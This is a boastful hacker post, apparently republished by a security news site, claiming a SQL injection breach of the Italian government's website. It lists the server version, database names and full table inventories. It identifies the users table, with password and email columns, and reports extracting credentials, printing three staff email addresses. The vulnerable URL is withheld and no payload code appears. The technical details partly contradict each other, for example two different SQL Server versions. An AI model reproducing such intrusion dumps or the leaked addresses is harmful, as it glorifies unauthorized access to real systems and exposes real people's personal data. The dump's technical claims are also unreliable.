SQL Injection Vulnerability in Italian Government's website !



Site Penetrate By : God_Of_Pain , Lord TittiS , SYSTEM_OVERIDE
[1] Site And Server Info

# Website link : https://governo.it/

# Bug Url: Can't Publish

# Powered By: ASP.NET

# Server Detail: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
# Server Name: WEB-VSQL1\INST1

# Current DB: chigi_intranet

# Database : MSSQL 2005


* [2] SQL Detail

# Databases List:
- chigi_intranet
- master
- tempdb
- model (LOCKED)
- msdb
- AAA (LOCKED)
- chigi_mag2006
- chigi_intranet
- chigi_developer
- sondaggidb (LOCKED)
- AffariRegionali_BO (LOCKED)

# Tables of 3 DB:

[+] chigi_intranet:
doc_tipi
qst_datipersonali
doc_target
doc_prov_tipi
eml_scrivi_a
doc_prov_aree
doc_monitoraggio_soggetto
eml_categoria
doc_monitoraggio_sede
doc_monitoraggio_organo
doc_monitoraggio_azione
doc_lingue
eml_autori_aree
doc_iter
doc_fonti
doc_dossier
doc_documenti_swap
doc_atti_tipi
doc_associatipi
Composizionenewsletter
eml_aree
Argomento
eml_registra_operazione
ana_amministratori_pubblici
qst_pianodiazione
web_webletter_log
pag_sezioni_pagine
pag_documenti_sezioni
faq_keyword
faq_faq_gruppi_keyword
doc_documenti_target
doc_documenti_monitoraggio
doc_documenti_links
doc_documenti_fonti
doc_documenti_dossier
doc_documenti_allegati
web_webletter_testo
pag_sezioni
int_interrogazioni
faq_form_richieste
faq_faq
faq_diritti_utenti
doc_monitoraggio_soggetto_prov_tipi
pag_autori_pagine
doc_monitoraggio_azione_prov_tipi
doc_fonti_tipi
doc_documenti
ana_amministratori_pubblici_mail
nwl_Newsletter
web_webletter
temp_monitoraggio
Results
pag_pagine
nwl_Notizianewsletter
nwl_Notizia_link
nwl_Notizia_argomento
nwl_Composizionenewsletter
nwl_Argomento
not_notizia_pub
not_notizia_link
not_notizia_argomento
not_notizia
not_immagini
log_ricerca
log_Domande
int_tipi_interrogazione
int_sedi
int_gruppi_parlamentari
ana_autori
gen_governi
faq_gruppi_keyword
faq_aree_tematiche
dtproperties
faq_aree
qst_semplificazione_proposte

[+] Master:
spt_server_info
spt_datatype_info
MSreplication_options
spt_datatype_info_ext
spt_provider_types
spt_fallback_usg
spt_fallback_dev
spt_fallback_db
spt_values
spt_monitor


[+] Msdb:
sysjobschedules
RTblIfaceMem
backupfile
syscategories
systargetservers
RTblWorkspaceItems
restorehistory
systargetservergroups
RTblDatabaseVersion
systargetservergroupmembers
sysalerts
RTblDTSProps
RTblVersionAdminInfo
restorefile
sysoperators
sysnotifications
RTblParameterDef
restorefilegroup
systaskids
syscachedcredentials
RTblIfaceHier
logmarkhistory
RTblNamedObj
sysdtscategories
sysdtspackages
RTblTypeInfo
sysdtspackagelog
RTblScriptDefs
RTblOLPProps
sysdtssteplog
RTblEnumerationDef
sysdtstasklog
RTblClassExtension
RTblSumInfo
RTblMDSProps
RTblEnumerationValueDef
RTblUMLProps
sysdbmaintplans
sysdbmaintplan_jobs
RTblUMXProps
sysdbmaintplan_databases
RTblSIMProps
sysdbmaintplan_history
RTblGENProps
RTblDTMProps
log_shipping_primaries
log_shipping_secondaries
RTblDBMProps
RTblEQMProps
log_shipping_monitor
mswebtasks
log_shipping_databases
log_shipping_plans
RTblVersions
log_shipping_plan_databases
log_shipping_plan_history
RTblDBXProps
RTblRelships
RTblSites
RTblProps
RTblRelshipProps
RTblPropDefs
RTblRelColDefs
RTblIfaceDefs
backupmediaset
sqlagent_info
RTblClassDefs
sysdownloadlist
backupmediafamily
sysjobhistory
sysjobs
RTblTFMProps
RTblRelshipDefs
backupset
sysjobservers
RTblTypeLibs
sysjobsteps



* [3] Users Found Information

The table "ana_autori" would seem the users table.
Search the columns:

aaut_alias
aaut_approva
aaut_cancella
aaut_cognome
aaut_consultazione
aaut_dipartimento
aaut_dossier
aaut_email
aaut_fonti
aaut_gestpagine
aaut_gestutenti
aaut_governi
aaut_id
aaut_logs
aaut_newsletter
aaut_nome
aaut_note
aaut_password
aaut_questiontime
aaut_rassegna
aaut_rep_amministratori
aaut_scrivia
aaut_sigla
aaut_tipi

Get data from "aaut_mail" and "aaut_password"

Result is:
a.decaroli@palazzochigi.it
cips @ciaps.com
f.salzano@governoit

Website link : https://governo.it/


News Source : Lord TittiS
Found this article interesting? Follow THN on Facebook, Twitter and LinkedIn to read more exclusive content we post.